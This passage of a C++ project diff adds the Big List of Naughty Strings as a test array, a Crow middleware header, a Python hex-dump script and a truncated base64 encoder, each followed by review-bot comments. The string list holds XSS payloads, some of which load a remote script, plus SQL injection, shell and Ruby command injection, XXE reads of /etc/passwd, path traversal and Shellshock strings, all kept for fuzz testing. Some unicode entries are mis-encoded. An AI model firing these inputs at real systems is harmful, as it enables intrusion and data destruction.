+// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + +"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", +"00ᅨルᅥヨ$-", + +// Unicode font +// +// Strings which contain bold/italic/etc. versions of normal characters + +"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", +"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", +"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", +"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", +"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", +"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", +"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", +"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", + +// Script Injection +// +// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + +"<script>alert(123)</script>", +"<script>alert('123');</script>", +"<img src=x onerror=alert(123) />", +"<svg><script>123<1>alert(123)</script>", +"\"><script>alert(123)</script>", +"'><script>alert(123)</script>", +"><script>alert(123)</script>", +"</script><script>alert(123)</script>", +"< / script >< script >alert(123)< / script >", +" onfocus=JaVaSCript:alert(123) autofocus", +"\" onfocus=JaVaSCript:alert(123) autofocus", +"' onfocus=JaVaSCript:alert(123) autofocus", +"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", +"<sc<script>ript>alert(123)</sc</script>ript>", 
+"--><script>alert(123)</script>", +"\";alert(123);t=\"", +"';alert(123);t='", +"JavaSCript:alert(123)", +";alert(123);", +"src=JaVaSCript:prompt(132)", +"\"><script>alert(123);</script x=\"", +"'><script>alert(123);</script x='", +"><script>alert(123);</script x=", +"\" autofocus onkeyup=\"javascript:alert(123)", +"' autofocus onkeyup='javascript:alert(123)", +"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", +"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", +"'`\"><\\x3Cscript>javascript:alert(1)</script>", +"'`\"><\\x00script>javascript:alert(1)</script>", +"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", +"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", +"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", +"ABC<div 
style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", +"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", +"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Ajavascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>", +"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a 
href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", +"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", +"`\"'><img src=xxx:x 
\\x09onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", +"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", +"\"`'><script>\\x3Bjavascript:alert(1)</script>", +"\"`'><script>\\x0Djavascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", +"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", +"\"`'><script>\\x09javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", +"\"`'><script>\\x00javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", +"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", +"\"`'><script>\\x0Cjavascript:alert(1)</script>", +"\"`'><script>\\x2Bjavascript:alert(1)</script>", +"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", +"\"`'><script>-javascript:alert(1)</script>", +"\"`'><script>\\x0Ajavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", +"\"`'><script>\\x7Ejavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", +"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", +"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", 
+"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", +"\"`'><script>\\x21javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", +"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", +"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", +"\"`'><script>\\x0Bjavascript:alert(1)</script>", +"\"`'><script>\\x20javascript:alert(1)</script>", +"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", +"<img \\x00src=x onerror=\"alert(1)\">", +"<img \\x47src=x onerror=\"javascript:alert(1)\">", +"<img \\x11src=x onerror=\"javascript:alert(1)\">", +"<img \\x12src=x onerror=\"javascript:alert(1)\">", +"<img\\x47src=x onerror=\"javascript:alert(1)\">", +"<img\\x10src=x onerror=\"javascript:alert(1)\">", +"<img\\x13src=x onerror=\"javascript:alert(1)\">", +"<img\\x32src=x onerror=\"javascript:alert(1)\">", +"<img\\x47src=x onerror=\"javascript:alert(1)\">", +"<img\\x11src=x onerror=\"javascript:alert(1)\">", +"<img \\x47src=x onerror=\"javascript:alert(1)\">", +"<img \\x34src=x onerror=\"javascript:alert(1)\">", +"<img \\x39src=x onerror=\"javascript:alert(1)\">", +"<img \\x00src=x onerror=\"javascript:alert(1)\">", +"<img src\\x09=x onerror=\"javascript:alert(1)\">", +"<img src\\x10=x onerror=\"javascript:alert(1)\">", +"<img src\\x13=x onerror=\"javascript:alert(1)\">", +"<img src\\x32=x onerror=\"javascript:alert(1)\">", +"<img src\\x12=x onerror=\"javascript:alert(1)\">", +"<img src\\x11=x onerror=\"javascript:alert(1)\">", +"<img src\\x00=x onerror=\"javascript:alert(1)\">", +"<img src\\x47=x onerror=\"javascript:alert(1)\">", +"<img src=x\\x09onerror=\"javascript:alert(1)\">", +"<img src=x\\x10onerror=\"javascript:alert(1)\">", +"<img src=x\\x11onerror=\"javascript:alert(1)\">", +"<img src=x\\x12onerror=\"javascript:alert(1)\">", +"<img src=x\\x13onerror=\"javascript:alert(1)\">", +"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", +"<img src=x onerror=\\x09\"javascript:alert(1)\">", +"<img src=x 
onerror=\\x10\"javascript:alert(1)\">", +"<img src=x onerror=\\x11\"javascript:alert(1)\">", +"<img src=x onerror=\\x12\"javascript:alert(1)\">", +"<img src=x onerror=\\x32\"javascript:alert(1)\">", +"<img src=x onerror=\\x00\"javascript:alert(1)\">", +"<a href=javascript:javascript:alert(1)>XXX</a>", +"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", +"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", +"<title onpropertychange=javascript:alert(1)></title><title title=>", +"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", +"<!--[if]><script>javascript:alert(1)</script -->", +"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", +"<script src=\"/\%(jscript)s\"></script>", +"<script src=\"\\%(jscript)s\"></script>", +"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", +"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", +"<IMG SRC=# onmouseover=\"alert('xxs')\">", +"<IMG SRC= onmouseover=\"alert('xxs')\">", +"<IMG onmouseover=\"alert('xxs')\">", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=javascript:alert('XSS')>", +"<IMG SRC=\"jav ascript:alert('XSS');\">", +"<IMG SRC=\"jav	ascript:alert('XSS');\">", +"<IMG SRC=\"jav
ascript:alert('XSS');\">", +"<IMG SRC=\"jav
ascript:alert('XSS');\">", +"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", +"<IMG SRC=\"  javascript:alert('XSS');\">", +"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", +"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", +"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", +"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", +"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", +"<SCRIPT SRC=//ha.ckers.org/.j>", +"<IMG SRC=\"javascript:alert('XSS')\"", +"<iframe src=http://ha.ckers.org/scriptlet.html <", +"\\\";alert('XSS');//", +"<u oncopy=alert()> Copy me</u>", +"<i onwheel=alert(1)> Scroll over me </i>", +"<plaintext>", +"http://a/%%30%30", +"</textarea><script>alert(123)</script>", + +// SQL Injection +// +// Strings which can cause a SQL injection if inputs are not sanitized + +"1;DROP TABLE users", +"1'; DROP TABLE users-- 1", +"' OR 1=1 -- 1", +"' OR '1'='1", +" ", +"%", +"_", + +// Server Code Injection +// +// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +"-", +"--", +"--version", +"--help", +"$USER", +"/dev/null; touch /tmp/blns.fail ; echo", +"`touch /tmp/blns.fail`", +"$(touch /tmp/blns.fail)", +"@{[system \"touch /tmp/blns.fail\"]}", + +// Command Injection (Ruby) +// +// Strings which can call system commands within Ruby/Rails applications + +"eval(\"puts 'hello world'\")", +"System(\"ls -al /\")", +"`ls -al /`", +"Kernel.exec(\"ls -al /\")", +"Kernel.exit(1)", +"%x('ls -al /')", + +// XXE Injection (XML) +// +// String which can reveal system files when parsed by a badly configured XML parser + +"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", + +// Unwanted Interpolation +// +// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. 
Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + +"$HOME", +"$ENV{'HOME'}", +"%d", +"%s", +"{0}", +"%*.*s", +"File:///", + +// File Inclusion +// +// Strings which can cause user to pull in files that should not be a part of a web server + +"../../../../../../../../../../../etc/passwd%00", +"../../../../../../../../../../../etc/hosts", + +// Known CVEs and Vulnerabilities +// +// Strings that test for known vulnerabilities + +"() { 0; }; touch /tmp/blns.shellshock1.fail;", +"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", +"<<< %s(un='%s') = %u", +"+++ATH0", + +// MSDOS/Windows Special Filenames +// +// Strings which are reserved characters in MSDOS/Windows + +"CON", +"PRN", +"AUX", +"CLOCK$", +"NUL", +"A:", +"ZZ:", +"COM1", +"LPT1", +"LPT2", +"LPT3", +"COM2", +"COM3", +"COM4", + +// IRC specific strings +// +// Strings that may occur on IRC clients that make security products freak out + +"DCC SEND STARTKEYLOGGER 0 0 0", + +// Scunthorpe Problem +// +// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +"Scunthorpe General Hospital", +"Penistone Community Church", +"Lightwater Country Park", +"Jimmy Clitheroe", +"Horniman Museum", +"shitake mushrooms", +"RomansInSussex.co.uk", +"http://www.cum.qc.ca/", +"Craig Cockburn, Software Specialist", +"Linda Callahan", +"Dr. Herman I. Libshitz", +"magna cum laude", +"Super Bowl XXX", +"medieval erection of parapets", +"evaluate", +"mocha", +"expression", +"Arsenal canal", +"classic", +"Tyson Gay", +"Dick Van Dyke", +"basement", + +// Human injection +// +// Strings which may cause human to reinterpret worldview + +"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. 
Please wake up, we miss you.", + +// Terminal escape codes +// +// Strings which punish the fools who use cat/type on this file + +"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", +"But now...[20Cfor my greatest trick...[8m", +"The quick brown fox... [Beeeep]", + +// iOS Vulnerabilities +// +// Strings which crashed iMessage in various versions of iOS + +"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", +"゚マᄈ0゚フネᄌマ" +};
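Review bot: `const std::string naughty_strings[]` is defined at namespace scope in a header that has neither `#pragma once` nor `#include <string>`; every translation unit that includes it gets its own copy (namespace-scope `const` has internal linkage) and pays dynamic initialisation of several hundred `std::string` objects at startup, so `const char* const naughty_strings[]` (or moving the definition into a .cpp with an `extern` declaration) would be cheaper. The same list is also checked in as src/blns.txt, which CMakeLists.txt converts with `xxd -i` into generated/blns.hpp, so the commit now carries two copies of the data that can drift apart; keeping one source is worth deciding now. Several `//` comments carry `\"` escapes copied from the text source (e.g. `// \"Byte order marks\"`), which is harmless but reads oddly in C++.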
\ No newline at end of file
diff --git a/include/token_authorization_middleware.hpp b/include/token_authorization_middleware.hpp
new file mode 100644
index 0000000000..801c75f91b
--- /dev/null
+++ b/include/token_authorization_middleware.hpp
@@ -0,0 +1,23 @@
+#pragma once
+
+#include <crow/http_request.h>
+#include <crow/http_response.h>
+
+namespace crow
+{
+ struct TokenAuthorizationMiddleware {
+
+ struct context {
+ std::unordered_map<std::string, std::string> cookie_sessions;
+ std::unordered_map<std::string, std::string> cookies_to_push_to_client;
+
+ std::string get_cookie(const std::string& key);
+
+ void set_cookie(const std::string& key, const std::string& value);
+ };
+
+ void before_handle(crow::request& req, response& res, context& ctx);
+
+ void after_handle(request& req, response& res, context& ctx);
+ };
+}
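Review bot: The header uses `std::unordered_map` and `std::string` but includes only the two crow headers; add `#include <string>` and `#include <unordered_map>` instead of relying on transitive includes. `before_handle` spells its first parameter `crow::request&` while `after_handle` uses bare `request&` inside the same `namespace crow`; pick one form. If `context` is Crow's per-request middleware context, which the `before_handle(req, res, ctx)` signature suggests, a `cookie_sessions` map living in it is constructed fresh for every request and cannot validate a session cookie presented on a later request; session state would then belong on the middleware object or in a shared store — src/token_authorization_middleware.cpp is not in view here, so confirm against it. Nothing documents what `cookie_sessions` maps (cookie value to user? session id?) or how `cookies_to_push_to_client` reaches the response, so a comment on each member would help.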
\ No newline at end of file
diff --git a/scripts/file_to_string_array.py b/scripts/file_to_string_array.py
new file mode 100644
index 0000000000..b81e854901
--- /dev/null
+++ b/scripts/file_to_string_array.py
@@ -0,0 +1,29 @@
+# -*- coding: utf-8 -*-
+import os.path
+import string
+import sys
+
+
+def print_buf(counter, buf):
+ buf2 = [('%02x' % ord(i)) for i in buf]
+ print '{0}: {1:<39} {2}'.format(('%07x' % (counter * 16)),
+ ' '.join([''.join(buf2[i:i + 2]) for i in range(0, len(buf2), 2)]),
+ ''.join([c if c in string.printable[:-5] else '.' for c in buf]))
+
+
+def process_xxd(file_path):
+ with open(file_path, 'r') as f:
+ counter = 0
+ while True:
+ buf = f.read(16)
+ if not buf:
+ break
+ print_buf(counter, buf)
+ counter += 1
+
+
+if __name__ == '__main__':
+ if not os.path.exists(sys.argv[1]):
+ print >> (sys.stderr, "The file doesn't exist.")
+ sys.exit(1)
+ process_xxd(sys.argv[1])
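Review bot: `print >> (sys.stderr, "The file doesn't exist.")` is wrong under Python 2 — the parenthesised expression is a tuple, so `print >>` tries to write to a tuple and raises instead of printing the message; it should be `print >> sys.stderr, "The file doesn't exist."` (or `sys.stderr.write(...)`, which also survives a move to Python 3). `sys.argv[1]` is read without checking `len(sys.argv)`, so invoking the script with no argument gives an IndexError rather than a usage line. The file is named file_to_string_array.py but `print_buf`/`process_xxd` emit an xxd-style hex dump, and the CMake hunk calls the real `xxd -i` rather than this script, so a module docstring stating what the script is for (or a rename) is needed. The `print` statements also make it Python 2 only, which the shebang-less header does not say.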
\ No newline at end of file
diff --git a/src/base64.cpp b/src/base64.cpp
new file mode 100644
index 0000000000..259288757b
--- /dev/null
+++ b/src/base64.cpp
@@ -0,0 +1,138 @@ +#include <base64.hpp> +#include <cassert> + +namespace base64 +{ +bool base64_encode(const gsl::cstring_span<> &input, std::string &output) +{ + static const char encoding_data[] = + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + + unsigned int input_length = input.size(); + + // allocate space for output string + output.clear(); + output.reserve(((input_length + 2) / 3) * 4); + + // for each 3-bytes sequence from the input, extract 4 6-bits sequences and + // encode using + // encoding_data lookup table. + // if input do not contains enough chars to complete 3-byte sequence,use pad + // char '=' + for (unsigned int i = 0; i < input_length; i++) { + int base64code0 = 0; + int base64code1 = 0; + int base64code2 = 0; + int base64code3 = 0; + + base64code0 = (input[i] >> 2) & 0x3f; // 1-byte 6 bits + output += encoding_data[base64code0]; + base64code1 = (input[i] << 4) & 0x3f; // 1-byte 2 bits + + + if (++i < input_length) { + base64code1 |= (input[i] >> 4) & 0x0f; // 2-byte 4 bits + output += encoding_data[base64code1]; + base64code2 = (input[i] << 2) & 0x3f; // 2-byte 4 bits + + + if (++i < input_length) { + base64code2 |= (input[i] >> 6) & 0x03; // 3-byte 2 bits + base64code3 = input[i] & 0x3f; // 3-byte 6 bits + output += encoding_data[base64code2]; + output += encoding_data[base64code3]; + } else { + output += encoding_data[base64code2]; + output += '='; + } + } else { + output += encoding_data[base64code1]; + output += '='; + output += '='; + } + } + + return true; +} + + +bool base64_decode(const gsl::cstring_span<> &input, std::string &output) +{ + static const char nop = -1; + static const char decoding_data[] = { + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, 62, nop, + nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, nop, nop, + nop, nop, 
